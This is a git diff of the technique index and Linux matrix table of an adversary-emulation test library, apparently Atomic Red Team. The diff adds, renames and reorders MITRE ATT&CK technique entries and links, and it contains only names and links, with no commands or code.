- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
@@ -666,6 +681,7 @@
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -676,6 +692,7 @@
- T1132.001 Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
@@ -743,6 +760,7 @@
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1204.002 Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
@@ -781,7 +799,7 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1059.005 VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 583cac14..ccbf3a7d 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -2,55 +2,67 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1551.003/T1551.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1551.004/T1551.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
-| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
